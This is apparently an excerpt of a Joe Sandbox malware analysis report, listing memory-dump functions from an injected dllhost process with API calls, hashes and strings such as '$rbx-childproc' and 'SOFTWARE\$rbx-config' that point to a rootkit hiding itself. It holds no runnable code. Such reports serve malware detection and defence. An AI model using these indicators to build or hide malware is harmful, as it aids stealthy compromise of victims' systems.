                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction ID: 48305f803f293ddec5f3931c42f65467c20365504f080a3b6a3f53de56a74bfe
                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction Fuzzy Hash: A4D19DB2644781CAFB2ADB659440BDE37A4F749B9CF540106EF8A67BA6CB3CD481C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction ID: af99934c436129ad321223bb4b68badd926e3b9bc2a2d268deffcc7e90b81214
                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction Fuzzy Hash: 67D18B3B740780CAFB629F659680BED37A8FB69788F142149EEC957B96DB34C090C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction ID: 9f2edcd22ff339fac1a10f4690f925bbb237d1bd662c2ff94e72297a1ec1730c
                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction Fuzzy Hash: 32D18072588B80CAFB2ADF6594447DE77A0F749B8CF545116EF8A67BA6CB38C481C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                  • String ID: d
                                  • API String ID: 3743429067-2564639436
                                  • Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                  • Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
                                  • Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
                                  • Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                  • String ID: d
                                  • API String ID: 3743429067-2564639436
                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction ID: d4cccac9f6330354f92cc7da93b19dc376f574822e866ed48f0c969f215c0817
                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction Fuzzy Hash: 07416C33254B85DAE765CF21E444B9FB7A1F389B98F448129DB8A17B58DF38C489CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                  • String ID: d
                                  • API String ID: 3743429067-2564639436
                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction ID: 27601eb524535a590ab7eb207c022eed9c5aec9d4536a118c02c05f4ac25c46f
                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction Fuzzy Hash: BB415B32294B80DAF765CF21E444B9A77A1F389F98F448129DB8A17A68DF3CD485CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                  • String ID: \\.\pipe\$rbx-childproc
                                  • API String ID: 166002920-1828357524
                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction ID: 2122d8477102575d73a4408c706c79ebf633f9545410ca1f2f096999fb48314e
                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction Fuzzy Hash: A3115632658B51C2F715DB21F558B9B6761F38DB98F940211EB9A12AE8CF3CC148CB40
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                  • String ID: \\.\pipe\$rbx-childproc
                                  • API String ID: 166002920-1828357524
                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction ID: c74fd2aceb61391fd1b517086b69a2ca0f30a4aec48b2079e62a1e4f492812bd
                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction Fuzzy Hash: 69112632658A40C2F715DB21F418B9B6760FB89B99F944215EB9A12AA8CF3CC148CB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: 6fcf7b432d52beef736993e902e9e4e3d878406fe98565b06715c11e3e38dcf3
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 8381AF70784243CAFA5FEB659441FEB6291AB8EF8CF544115AB0A773F6DB38C8428300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: da9a399ad666ffbd2fedfc340733b3d021ae22e6e339704dadd05f13fd0bf4ef
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: B481F83A7803C0CEFA579B25AA41FDD629DBBBE780F0471ADD9E447796DA38C4428700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: 0cdafcd12d8a8267754769ee7142aa3d2a49fac9378a4526e43c8a55d6935118
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 1081A2316C8641C6FB5FEB659481FEB6291AB8EF8CF4840159F4B777B6DAB8C8418700
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9B31
                                  • GetLastError.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9B3F
                                  • LoadLibraryExW.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9B69
                                  • FreeLibrary.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9BD7
                                  • GetProcAddress.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9BE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction ID: 4f5140ad972371bb917a961e9df586888d60b2ee54106ec86cbc4c74db65ce89
                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction Fuzzy Hash: 95316F31252752D1FE1BEB16A800FEB6394B74DFACF590625AF1E6A7A4DE38C4448310
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9B31
                                  • GetLastError.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9B3F
                                  • LoadLibraryExW.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9B69
                                  • FreeLibrary.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9BD7
                                  • GetProcAddress.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9BE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction ID: 6fa56fcbcd7f737544756ddb81630fc738190fcb906897ac3c9022a9818d5bb5
                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction Fuzzy Hash: 16319231296640E1FE1BDF16A804FE62394BB4DFA8F5A0625EE1B677A4DF38D844C310
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction ID: a2ab14e64a64133462c5edd601722e48caf9ca902d41b7ba8d6b43280e4c4360
                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction Fuzzy Hash: AE118B32250B50C6F756DB52E958B9BA6A4F78CBE8F440224EF5E9BBD4CF78C8048740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction ID: b1ab7f924f6da323a37666b2ed111f67b07ea1e6f93795b4ce6fff062c03e4fb
                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction Fuzzy Hash: 16115E31250B40C6F756DB52E854B5AA6A0FB8CFE9F444224EB5F97BA4CF7CD8448740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Delete$CloseEnumOpen
                                  • String ID: SOFTWARE\$rbx-config
                                  • API String ID: 3013565938-3990243012
                                  • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                  • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                  • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                  • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Thread$Current$Context
                                  • String ID:
                                  • API String ID: 1666949209-0
                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction ID: cabc01a258e4f2aa80af5b93105548959e3bfcc54fb9505c87108b0efcfe9c34
                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction Fuzzy Hash: 5DD17836248B89C2EA75DB1AE49479A77A0F38CF88F100116EB8E577B5DF78C551CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Thread$Current$Context
                                  • String ID:
                                  • API String ID: 1666949209-0
                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction ID: a9197c9b8b93f14c0c13a63fa18fb151d2d826b71508fe3a90a7e3bc62c36b7a
                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction Fuzzy Hash: 3FD16936288B88C2FA65DB16E49479A77A0F38CF88F100116EB8E57B79DF79C551CB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Free$CurrentThread
                                  • String ID:
                                  • API String ID: 564911740-0
                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction ID: 9eccd23449cea70b8449abd76f7d20eab5cdd6dd858dd86f1832d5b0d80129a1
                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction Fuzzy Hash: 0A519931281B46D6FB0EEB24D950AD623A1BB8CB4CF840916E71E667F6EF74C525C380
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Free$CurrentThread
                                  • String ID:
                                  • API String ID: 564911740-0
                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction ID: a0dae6927981f276a6ac8115aeef4911d1c8257720173d68b69ea820ba4223aa
                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
